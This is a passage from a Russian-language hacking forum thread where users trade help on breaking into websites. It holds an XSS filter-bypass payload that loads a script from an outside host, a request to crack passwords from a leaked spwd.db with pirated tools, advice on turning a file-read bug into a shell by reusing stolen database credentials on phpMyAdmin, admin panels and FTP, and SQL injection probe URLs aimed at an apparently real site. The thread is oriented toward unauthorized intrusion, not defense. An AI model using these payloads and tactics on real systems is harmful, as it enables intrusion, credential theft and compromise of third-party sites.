05.12.2009, 00:07
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Сообщение от warlok
Есть 2 таблицы в бд с максимальным размером в 20 символов в каждой, вывод с них нефильтруеться т.е. если я в одну таблицу помешяю <script>alert('x')// а во 2 </script>
в итоге я получаю алерт а в сурсе я вижу такое
Код:
<script>alert('x')// (Password: </script>
мож нает какой вариант прокатит в этом случае, придумал разбивать скрипт и коментить левое выходит примерно так:
Код:
<script src="http:/* (Password: *///1.ru:73/1.js">
но скрипт то невыполняеться при таких условиях  Так попробуй:
<script src="http:<!-- (Password: -->//1.ru:73/1.js">
|
|
|
05.12.2009, 00:06
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
слил файлик spwd.db
чем посоветуете выдрать логины и пароли и чем их лучше брутить??
З.Ы. если есть брутер для GPU типа PasswordsPro с лекарством, скиньте плиз ссылку в пм
|
|
|
|
05.12.2009, 00:52
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
если в JETDATABASE DRIVER есть скул на http header можно ли произвести инъекцию каким нибудь прогой? Например на referrer
|
|
|
|
05.12.2009, 13:36
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Уважаемые Гуру, есть у меня один ну почти ламерский, расстраивающий меня вопрос. Нашел на сайте чтение файлов через readfile хочу шелл. Вначале о хорошем - уязвимость выводит и списки файлов в директориях.
Теперь о плохом. Во первых настройки пхп читать все что в голову взбредет не позволяют, только из нескольких папок. На сайте довольно много субдоменов но все абсолютно однотипные(кроме парочки). Нашел пхп скрипты с паролями-явками от БД - с наружи подключиться нельзя, других сайтов на сервере нету. Почитал несколько пхп файлов, но и в них ничего интереснее хсс пассивной не нашел. Теперь творческий кризис - не продолжать же методом научного тыка читать все файлы и искать инклюд или иньекцию, может есть какие-то другие варианты?
|
|
|
|
05.12.2009, 13:50
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Конфиги с явками и паролями, тыкать пароли на всё что можно или искать баги позволяющие сделать что-то более существенное в коде.
Тоесть простая читалка без дополнений не даст тебе ничего кроме очевидного -- чтения файлов.
Ищи админки, пыхадмины, возможно пароль от админки не в базе а в файле, тогда туда можно попасть, в пыхадмин тоже можно попасть пасс к БД у тебя есть, вопрос какая там авторизация стоит. Ну и т.д.
Вобщем читай )
|
|
|
|
05.12.2009, 14:05
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Про пхпмайадмин спасибо, вот это я точно запамятовал. Пока не нашел его, но мб мне повезет. Зато уже третий набор логин-пароль от БД нашел. Есть еще надежда найти sql иньекцию - ибо судя по другим скриптам, те, кто писали этот сайт оч верят в intval. Буду продолжать искать, чую логи у сервера сегодня хорошо разрастутся. Надо попробовать еще с этими пассами по фтп подключаться, вдруг повезет.
|
|
|
|
05.12.2009, 22:48
|
|
Участник форума
Регистрация: 27.08.2007
Сообщений: 155
Провел на форуме:
268091
Репутация:
36
|
|
Как можно сделать в булке/ipb кол-во сообщений отрицательным(-1)?
|
|
|
|
05.12.2009, 23:07
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от ZaraZ
Как можно сделать в булке/ipb кол-во сообщений отрицательным(-1)?
Причем здесь уязвимости?
|
|
|
|
06.12.2009, 00:00
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607
Репутация:
19
|
|
В поле http://www.site.ru/pop/search.cgi?q='
Software error:
DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1 at /usr/local/apache/htdocs/pop/search.cgi line 111.
Это SQL инекция ? Тогда как раскрутить?
|
|
|
|
06.12.2009, 00:02
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Сообщение от Cybersteger
В поле http://www.site.ru/pop/search.cgi?q='
Software error:
DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1 at /usr/local/apache/htdocs/pop/search.cgi line 111.
Это SQL инекция ? Тогда как раскрутить?
скорее всего да
если там идут числовые значения то можно попробовать так
http://www.site.ru/pop/search.cgi?q=2-1
http://www.site.ru/pop/search.cgi?q=1/**/and/**/1=1
http://www.site.ru/pop/search.cgi?q=1/**/and/**/1=2
ну а так сайт в ЛС если не трудно 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1736726){kind=avatar}
Похожие темы
Комбинированный вид
